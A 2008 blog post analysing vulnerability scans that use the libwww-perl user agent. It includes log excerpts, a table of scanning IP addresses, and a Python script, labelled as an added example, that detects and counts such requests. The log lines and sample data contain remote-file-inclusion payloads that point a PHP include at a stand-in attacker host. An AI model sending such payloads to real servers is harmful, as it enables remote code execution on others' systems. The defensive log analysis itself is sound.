Exploit and Vulnerability Scanners using libwww-perl

Posted 2008-08-21 in Spam by Johann.

One of the stranger things I see is people scanning for vulnerable servers who always use the same libwww-perl user agent, as in this example:

… "GET /inc/irayofuncs.php?irayodirhack=http://<sploit server>/id??%0D?? HTTP/1.1" 403 4232 "-" "libwww-perl/5.805" "-"

These people definitely come around:

$ grep -c '"libwww-perl' <this week’s log>
111

With the exception of the following outfit, every libwww-perl request in the log is vulnerability scanning or an exploit attempt against the server.

$ grep '"libwww-perl' <log> | grep -v http
96.244.75.34 … "GET / HTTP/1.1" 403 345 "-" "libwww-perl/5.808" "-"
70.88.158.109 … "GET / HTTP/1.1" 403 345 "-" "libwww-perl/5.808" "-"

Obviously, the first thing to do is whitelist user agents so that none of the libwww-perl dirt slips through and gets your server hacked.
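The two grep checks above, as an added example that is not from the original post: a small Python script that parses combined-format log lines, picks out libwww-perl requests, separates the remote-file-inclusion shape (a URL passed as a query parameter, like the irayodirhack hit) from plain probes such as "GET /", and counts them per source IP the way the statistics below do. The log lines and addresses in it are constructed for the example.

```python
import re
from collections import Counter

# Apache "combined" log format with the client IP first, as in the excerpts above.
# Trailing extra fields (the final "-" in the post's lines) are ignored by match().
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# A query parameter whose value is a URL: the remote-file-inclusion probe shape.
URL_PARAM_RE = re.compile(r'[?&][^=&]+=https?://', re.IGNORECASE)

# Constructed sample lines (addresses, paths and timestamps are made up).
SAMPLE_LOG = """\
216.118.81.182 - - [20/Aug/2008:03:12:45 +0200] "GET /inc/irayofuncs.php?irayodirhack=http://203.0.113.9/id??%0D?? HTTP/1.1" 403 4232 "-" "libwww-perl/5.805"
216.118.81.182 - - [20/Aug/2008:03:12:46 +0200] "GET /index.php?page=http://203.0.113.9/cmd.txt? HTTP/1.1" 403 4232 "-" "libwww-perl/5.805"
96.244.75.34 - - [20/Aug/2008:04:01:02 +0200] "GET / HTTP/1.1" 403 345 "-" "libwww-perl/5.808"
198.51.100.7 - - [20/Aug/2008:05:30:11 +0200] "GET /blog/ HTTP/1.1" 200 8120 "-" "Mozilla/5.0 (X11; Linux) Firefox/3.0"
"""

def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def classify(entry):
    """'rfi' for a libwww-perl hit carrying a URL in the query string (the scanner
    pattern), 'probe' for any other libwww-perl hit, None for everything else."""
    if not entry['ua'].startswith('libwww-perl'):
        return None
    return 'rfi' if URL_PARAM_RE.search(entry['req']) else 'probe'

def summarize(log_text):
    """Count libwww-perl hits per source IP, split by kind, like the statistics table."""
    per_ip = {}
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        kind = classify(entry)
        if kind:
            per_ip.setdefault(entry['ip'], Counter())[kind] += 1
    return per_ip

if __name__ == '__main__':
    rows = sorted(summarize(SAMPLE_LOG).items(), key=lambda kv: -sum(kv[1].values()))
    for ip, counts in rows:
        print(f"{sum(counts.values()):4d}  {ip:<16} rfi={counts['rfi']} probe={counts['probe']}")
```

Counting from the logs is the reliable part; the user agent string is chosen by the client, so a user-agent whitelist only stops the scanners that do not bother to change it.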

Statistics

The next thing is to take a look at where this scanning is coming from. I am using the last half year of my log files here.

Requests | IP address/Hostname | Hosting | Description
113 | 216.118.81.182 (216.118.81.0/24) | Site5 hosting, Net Access Corporation, US |
63 | 65.91.249.193 (65.88.0.0/14) | Level3, US |
46 | 217.20.118.202 deltaesports.com (217.20.112.0/20) | netdirekt e. K., DE |
41 | 217.20.116.93 atlas.f2k-server.org (217.20.112.0/20) | netdirekt e. K., DE |
40 | 195.205.178.120 bip.erg-bierun.com.pl (195.205.0.0/16) | Zaklady Tworzyw Sztucznych Erg-Bierun S.A., PL | Blacklisted on mail blocklists.
35 | 80.253.99.164 reds.freshwebhosts.com (80.253.96.0/19) | Commercial Collocation Ltd, UK | Blacklisted as well.
31 | 213.228.155.43 smol-srv01.netvisao.pt (213.228.128.0/18) | Cabovisao SA, PT |
29 | 38.117.65.239 (38.0.0.0/8) | Ravand CyberTech Inc, Performance Systems International Inc., US |
27 | 87.230.77.168 johannes.jarolim.com (87.230.0.0/17) | Hosteurope GmbH, DE |
27 | 216.239.69.227 onnet1.onnet.ca (216.239.64.0/19) | VIF Internet, CA |

As you can see, the IP addresses are all over the place, both geographically and in what the hosts are used for. Also, for half a year, 113 requests isn’t much, so each system either runs at a stealthy low scanning rate (unlikely) or the scanner processes are discovered sooner or later and the security holes are plugged (more likely).

I haven’t had one of my servers hacked, but one thing I would like to find out is whether these computers are exploited beyond the vulnerability scanning.
